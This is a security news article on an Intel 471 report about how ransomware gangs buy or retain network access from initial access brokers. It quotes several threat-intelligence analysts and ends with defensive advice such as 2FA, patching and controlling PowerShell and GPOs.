Ransomware Actors, Access Brokers Form Lucrative Relationships 

When ransomware crews need access to launch their attacks, they reach out to initial access merchants—malicious actors who offer to sell compromised network access to cybercriminals.  

As key enablers in the financially motivated cybercriminal underground, these brokers sell network access on popular cybercriminal forums, with prominent actors on the scene for more than a decade. 

A report from Intel 471 examines the evolving relationship between these two parties and indicated that, as ransomware continues to proliferate, operators will increasingly acknowledge the benefits of purchasing access from merchants.

Ransomware and Access Brokers: A Cyberunderground Ecosystem

Brad Crompton, CTI director for Intel 471, explained both access brokers and ransomware operators exist across the complex cyberunderground ecosystem, operating on forums, marketplaces and, in some cases, only with trusted contacts.

“Currently within the cyberunderground, this relationship exists in two forms: Opportunistic and targeted,” he said. 

In opportunistic form, access brokers target organizations on a global scale with no target list. They then publicly offer access for sale on several underground criminal forums or marketplaces.

“Subsequently, the access is bought, by chance, by ransomware operators,” Crompton explained. 

He added that while the targeted form is very hard to observe and track, Intel 471 discovered that some ransomware operations have preferred access brokers who they will consistently use for access to corporate networks, placing them on a retainer for their services. 

“This is becoming more common, however, not just with ransomware operators,” he said. 

Access brokers who are more concerned with their operational security (OPSEC) are choosing to only do business with trusted contacts across the cyberunderground, again making it more difficult for them to be tracked and their operations thwarted.

“Additionally, these access brokers who operate in this targeted manner, will either have lists of organizations that if compromised they will make their chosen buyer aware of the access they have acquired, or will actively try to compromise set lists of businesses for their buyers,” he said. 

Intel 471 also identified ransomware blog site posts before access brokers offered access for the same organizations.

Crompton said it is also possible that the access brokers work with the ransomware group and/or their affiliates to identify relevant information about the compromise. This, in turn, creates an opportunity for the access brokers to then use the information after an organization has been compromised.

John Bambenek, principal threat hunter at Netenrich, a security and operations analytics SaaS company, pointed out that in many ways, the cybercrime ecosystem has developed specialized “career fields” in a similar way that cybersecurity has developed specializations.

“This means there are many more partnerships and boutique actors helping a variety of groups,” he said. “Getting initial access is a specialized skill set, just like money laundering in cryptocurrency and ransomware development are skill sets. This specialization makes the ecosystem more resilient and more difficult to bring to justice.”

He said more steps are needed to accomplish the overall goal of ransomware, which means there are additional points of interdiction and detection.

“PowerShell and GPOs are the soft underbelly of most organizations,” he explained. “If you tightly control those two things so nothing can get deployed enterprise-wide without strong controls, you’ll be doing well.”

Bambenek added ransomware is, fundamentally, the only real disaster recovery event organizations will have to prepare for.

“You can prevent most ransomware, but attackers are always evolving,” he said. “What you can prepare for is to have a rapid disaster recovery process and make sure your staff dusts off those CISSP books.”

Ivan Righi, senior cyber threat intelligence analyst at Digital Shadows, a provider of digital risk protection solutions, noted the entire ransomware process has become more like a legitimate business and groups are learning the most effective ways to conduct attacks.

“It is faster and more cost-efficient for ransomware groups to simply purchase numerous accesses and conduct multiple attacks at once instead of spending a lengthy amount of time trying to break into one organization,” he said. “This means that attacks are moving away from ‘big game hunting’ and we are seeing smaller organizations being targeted by ransomware groups more frequently.”

Righi added that large ransomware groups will likely attempt to recruit more initial access brokers into their operations in the future.

“By working together with these threat actors, ransomware groups can increase the number of attacks they conduct, resulting in higher profits and a more prominent brand,” he said. “These relationships are likely to keep evolving and make the ransomware business more professionalized.”

To protect against these attacks, it is crucial that organizations monitor criminal locations for exposures relating to assets, such as stolen credentials or access offerings.

Organizations should also ensure two-factor authentication (2FA) is enabled wherever possible, minimize the attack surface of remote services, take a risk-based approach to vulnerability management and regularly patch high-risk vulnerabilities.

“Protecting against these threat actors means shutting down as many vectors of attacks as possible,” Righi said. “While shutting down every attack vector is impossible, organizations that make themselves harder targets are less likely to be targeted and threat actors will typically move on to easier targets.”

Crompton said over the next six to 12 months, this relationship is unlikely to change, with more “veteran” access brokers continuing to do business solely with ransomware groups. 

“However, as more ransomware variants are developed, we will likely see access brokers conducting business with multiple groups in order to maximize their profits,” he explained. “Additionally, as new actors take up the access broker job role within the cyberunderground, it is highly likely that we will see a larger number of businesses impacted which, in turn, will likely result in a larger number of ransomware events.” 

He added it is also possible that ransomware operations will, if they have not already, actively incorporate the role of access merchants into their operations as a singular job for which they will receive a cut of the profits, much like ransomware affiliates. 

“In terms of how IT security must evolve, the most important will be to increase cybersecurity mechanisms throughout the organization and utilize a CTI provider to stay one step ahead of the curve,” he said. “Prevention is better than a cure and IT security is no different.”

Source link

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button

Get our latest downloads and information first. Complete the form below to subscribe to our weekly newsletter.